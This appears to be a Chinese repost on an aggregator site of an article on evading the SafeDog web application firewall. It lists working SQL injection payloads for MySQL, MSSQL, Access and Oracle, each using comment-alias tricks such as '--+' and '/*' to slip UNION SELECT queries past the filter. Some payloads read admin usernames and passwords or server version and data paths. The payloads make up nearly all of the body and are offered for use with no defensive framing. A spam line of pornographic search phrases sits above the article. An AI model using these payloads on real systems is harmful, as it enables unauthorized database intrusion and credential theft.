日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

明小子mysql_安全狗最新版SQL注入防护多种方式bypass(简简单单/各种数据库通用)...

發布時間:2023/12/14 数据库 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 明小子mysql_安全狗最新版SQL注入防护多种方式bypass(简简单单/各种数据库通用)... 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

注釋一:/**/Mysql下的繞過:1、99999=(select 1?as '/*') union all select 1 as '*//*',2,3,4,5 from mysql.user as x*/%23

2、.and 1=(select "/*") union all select 1,@@version,3,4,5 from mysql.user-- */

3、union all /*!/*!select*/1 as %27*/%27,2,3,4,5 from mysql.user%23

MSSQL下的繞過:1、數字型:.and 0=(select 1 as [/*]) union all select 1,2,3,4,5,6 from [test] as [*/]--2、字符型:xxx'and'0'=(select 1 as [/*]) union all select 1,2,3,4,5,6 from [test] as [*/]--Access下的繞過:1、數字型:.and 0=(select top 1 1 as [/*] from admin as [*//*]) union all select 1 as [*//*],2,username,password,5 from admin as [*/]2、字符型:xxx'and'0'=(select top 1 '1' as [/*] from admin as [*//*]) union all select 1 as [*//*],2,username,password,5 from admin as [*/]Oracle下的繞過:1、數字型:.and 1=(select 1 as "/*" from dual) union all select 1,2,3,4,5 from dual-- */2、字符型:xxx'and'a'=(select '/*' from dual) union all select 1,2,3 from dual where '*/'='*/'是不是感覺太麻煩了?當然有更簡單的!請看下面。注釋二:--+(瀏覽器下輸入等同于--%20)、--%2b測試發現,可以通過將--+、--%2b作為別名或直接select '--+'等來繞過安全狗。安全狗會將--+后的語句給截取掉,只拿前面的語句去進行檢查。不管是mysql、mssql、access、oracle都可以這樣繞過安全狗限制。拿Mysql做演示,如:99999=(select 1 as '--+') union all select 1,2,3,4,5 from mysql.user%23

簡簡單單就bypass了!還可以直接select '--+':99999=(select '--+') union all select 1,2,3,4,5 from mysql.user%23更簡單的:%2b'--+' union all select 1,'haha',3,4,5 from mysql.user%23

mysql下還可以這樣(僅適用于mysql):/*--+/*x/*/union all select 1,@@version,@@datadir,4,5 from mysql.user%23

還有這樣:99999=(select{--+1}) union all select 1,2,3,4,5 from mysql.user%23注意:是反引號額!注釋符“--”難道不行么?當然也有方法,不過僅限于mysql:99999=(/*!select--*/1) union all select 1,2,3,4,5 from mysql.user%23

MSSQL下的繞過:1、9999.and '1'=(select '-- ') union all select 1,2,32、xxx'and'1'=(select '-- ') union all select 1,2,33、xxx'%2b'--+'union all select 1,2,3Access下的繞過:1、.and '0'=(select top 1 '--+' from admin) union all select 1,2,3 from admin2、.and'a'%2b'--+'union all select 1,2,3 from adminOracle下的繞過:1、.and 0=(select 1 as?"--+") union all select 1,2,3 from dual--2、and'a'=(select '--+' from dual) union all select 1,2,3,4,5 from dual--

總結

以上是生活随笔為你收集整理的明小子mysql_安全狗最新版SQL注入防护多种方式bypass(简简单单/各种数据库通用)...的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。